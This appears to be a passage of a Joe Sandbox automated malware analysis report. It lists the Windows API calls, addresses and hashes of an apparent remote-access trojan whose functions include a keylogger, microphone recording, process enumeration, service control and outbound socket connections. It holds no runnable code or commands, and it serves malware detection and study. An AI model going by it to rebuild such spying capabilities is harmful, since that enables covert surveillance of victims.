                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                                • String ID:
                                                • API String ID: 531887698-0
                                                • Opcode ID: c0d659e62792981766755c086100ca441f72e45028c496466d56a8d6ef736a94
                                                • Instruction ID: 0f5b62609c9ab7160e54374dd8f2dd13e38c4702fcd5a151f52b0c56a5937fd1
                                                • Opcode Fuzzy Hash: c0d659e62792981766755c086100ca441f72e45028c496466d56a8d6ef736a94
                                                • Instruction Fuzzy Hash: CD312A75A0010DAFCF04EFA4ED998EEBBB9FB48315F1041A9E906A3290DB356F05DB54
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D59C
                                                • _itoa.MSVCRT ref: 0040D5A3
                                                  • Part of subcall function 004093E2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004093F3
                                                  • Part of subcall function 004093E2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409407
                                                  • Part of subcall function 004093E2: Process32FirstW.KERNEL32(00000000,?), ref: 00409428
                                                  • Part of subcall function 004093E2: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409435
                                                  • Part of subcall function 004093E2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409456
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094D1
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094E1
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094EE
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0), ref: 004094FE
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004146D0,00000000), ref: 0040950B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D5C6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D5D0
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D5EA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                                • String ID:
                                                • API String ID: 1707565870-0
                                                • Opcode ID: 4face28eaf6ff0eb16788548de60417d0a5097f14054542bf19cdca52f2a94fe
                                                • Instruction ID: 07d0028aa8ada5f3dcc480a182bb9663aacaae6e203af6db838c213e279ed8e4
                                                • Opcode Fuzzy Hash: 4face28eaf6ff0eb16788548de60417d0a5097f14054542bf19cdca52f2a94fe
                                                • Instruction Fuzzy Hash: 780121729001199BCB14EBA1DD4AAEE7738FB15306F00447AF106E20D1EA389B48CF59
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DE2F
                                                • atoi.MSVCRT(00000000), ref: 0040DE3C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DE4C
                                                • atoi.MSVCRT(00000000), ref: 0040DE53
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DE62
                                                • atoi.MSVCRT(00000000), ref: 0040DE69
                                                  • Part of subcall function 004013C9: _ftol.MSVCRT ref: 0040142F
                                                  • Part of subcall function 004013C9: waveInOpen.WINMM(00419178,000000FF,004191F8,00401528,00000000,00030008), ref: 00401459
                                                  • Part of subcall function 004013C9: waveInStart.WINMM ref: 00401472
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                                • String ID:
                                                • API String ID: 463581448-0
                                                • Opcode ID: 6d28d9b9ba21ee658b1182ea5ea35368b30efa8681223980126826b427cbd575
                                                • Instruction ID: 92725c326574f6ead67a7d8fd03051f9e57b40fbe86d0bf9ab57b7e358f10fd0
                                                • Opcode Fuzzy Hash: 6d28d9b9ba21ee658b1182ea5ea35368b30efa8681223980126826b427cbd575
                                                • Instruction Fuzzy Hash: 9C014471A001159BDB04BBF1EC5E9FE7768EB50306B0048BEE502E31E0EE7859048B54
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00419288,?,?,?,?,?,?,?,0041056F), ref: 00410A5E
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,0041056F), ref: 00410A6B
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,0041056F), ref: 00410A73
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410A80
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,0041056F), ref: 00410A8F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410AA1
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410AA4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0041056F), ref: 00410AA9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: db27cd96c616ce4678e114e9c54766b2d86c0f1e8179ad45d936c5fbf1742643
                                                • Instruction ID: b69029bf0ec0e393972e793565eb66cbe89d492d466497b744cb5ceaf3125261
                                                • Opcode Fuzzy Hash: db27cd96c616ce4678e114e9c54766b2d86c0f1e8179ad45d936c5fbf1742643
                                                • Instruction Fuzzy Hash: F7F06231540224BFD710AF74AC8CEFF3FACEF59692B004125F902D3195DB649E468AA9
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00419288,?,?,?,?,?,?,?,004104E8), ref: 00410B57
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004104E8), ref: 00410B64
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B6C
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B79
                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004104E8), ref: 00410B88
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B9A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B9D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004104E8), ref: 00410BA2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: 902a8f09ee4b1fc8a84915185151f4197eaa66007d3a86b852d8731c97519edf
                                                • Instruction ID: 49de90075d0cc7e98cfb0c102fff2fe0d21623244b77087224835c578392e202
                                                • Opcode Fuzzy Hash: 902a8f09ee4b1fc8a84915185151f4197eaa66007d3a86b852d8731c97519edf
                                                • Instruction Fuzzy Hash: 71F0C871600114BFD700AF74AC89EFF3FACEB08256F004025FA02D3154D7749E428AA9
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00419288,?,?,?,?,?,?,?,00410457), ref: 00410BBE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00410457), ref: 00410BCB
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00410457), ref: 00410BD3
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410BE0
                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00410457), ref: 00410BEF
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410C01
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410C04
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00410457), ref: 00410C09
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: f0befdd2f5e3e2c2769064a6cebd99a09e1ad9aa91ee08ebdf44b5344283a862
                                                • Instruction ID: daae58050849ff11ee2bf19fcdfff762d724f4f04cdb2464a271fb0fda49e823
                                                • Opcode Fuzzy Hash: f0befdd2f5e3e2c2769064a6cebd99a09e1ad9aa91ee08ebdf44b5344283a862
                                                • Instruction Fuzzy Hash: F8F06271600224BFD700AF75EC88EFF3FACEB49656B004125FA06D7154DB789E468AA9
                                                APIs
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6C9BB010,?,?,00410EF5,?), ref: 0041147E
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,00410EF5,?), ref: 0041149C
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00410EF5,?), ref: 004114A4
                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,00410EF5,?), ref: 004114AF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,00410EF5,?), ref: 004114B9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114C2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00410EF5,?), ref: 004114D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114DA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                                • String ID:
                                                • API String ID: 1083762089-0
                                                • Opcode ID: 32f5f12b531cbd0cbd753a166e607dad39a2b18f34ffb0a10629212d97c95e66
                                                • Instruction ID: 4b6a9b0f99f3ec694b1fd54bed7ea3cd1bd1d8914a05a2300b273985db0e74d2
                                                • Opcode Fuzzy Hash: 32f5f12b531cbd0cbd753a166e607dad39a2b18f34ffb0a10629212d97c95e66
                                                • Instruction Fuzzy Hash: 8801A27550015EEFCF04EF64EC589EA3B79FB04316B00C164FD2A971A0EB34AA59CB58
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410154
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                  • Part of subcall function 004106B8: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004106C8
                                                  • Part of subcall function 004106B8: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 004106E1
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,00000000,?), ref: 0041019F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 004101A9
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 004101BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101D1
                                                  • Part of subcall function 0040209F: CreateThread.KERNEL32(00000000,00000000,004020BE,?,00000000,00000000), ref: 004020B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101E6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                                • String ID:
                                                • API String ID: 2339118965-0
                                                • Opcode ID: e35d68d86eefed33068762f96d27e4212e4c55f873384372261b56d4c10a5413
                                                • Instruction ID: e44f525c74eb180ea185d678458459fb690260886d4cfae9058b836792fbce52
                                                • Opcode Fuzzy Hash: e35d68d86eefed33068762f96d27e4212e4c55f873384372261b56d4c10a5413
                                                • Instruction Fuzzy Hash: D811A372A002186BCB00FFA5DC5ACEF376CBA45345B00457EF902E71D1EA789A4887AD
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041245C
                                                  • Part of subcall function 004124FB: RegisterClassExA.USER32(00000030), ref: 00412541
                                                  • Part of subcall function 004124FB: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041255C
                                                  • Part of subcall function 004124FB: GetLastError.KERNEL32(?,00000000), ref: 00412566
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00412493
                                                • lstrcpynA.KERNEL32(00419F58,00000040), ref: 004124AB
                                                • Shell_NotifyIconA.SHELL32(00000000,00419F40), ref: 004124C1
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004124D4
                                                • TranslateMessage.USER32(?), ref: 004124DE
                                                • DispatchMessageA.USER32(?), ref: 004124E8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID:
                                                • API String ID: 1970332568-0
                                                • Opcode ID: 2fd268903669e1d90c72dd924620844bddff3956caf8f088ad50424f37764ba7
                                                • Instruction ID: 945de9d12dbaddab0209f70888868605a33d26d39a197056befd316b5a8ef4ad
                                                • Opcode Fuzzy Hash: 2fd268903669e1d90c72dd924620844bddff3956caf8f088ad50424f37764ba7
                                                • Instruction Fuzzy Hash: 9B115EB2801118BBD7109F95ED08EDB3BACFB49711F008125F609E2050D7B89A46CBAC
                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 0040E028
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040E04B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040E05D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E078
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E081
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E098
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E0B3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@V01@@$??1?$basic_string@Sleep
                                                • String ID:
                                                • API String ID: 3281088245-0
                                                • Opcode ID: 2b5c3d421aa743e0b0dee230638f2a2e513bff52e28b37d4c6d808fce09c79a0
                                                • Instruction ID: 7deddea6f96e0ed7fbd893dd57507630e2d8b370f4cd2ffef670f1e4ca3dce7f
                                                • Opcode Fuzzy Hash: 2b5c3d421aa743e0b0dee230638f2a2e513bff52e28b37d4c6d808fce09c79a0
                                                • Instruction Fuzzy Hash: 03114FB19011546FDB04FBA1ED5A9EE3739AB40305F0048BAF902A61E2EE755A448B59
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,75920F00,?,?,00404852), ref: 004050D1
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,75920F00,?,?,00404852), ref: 004050E8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004050FC
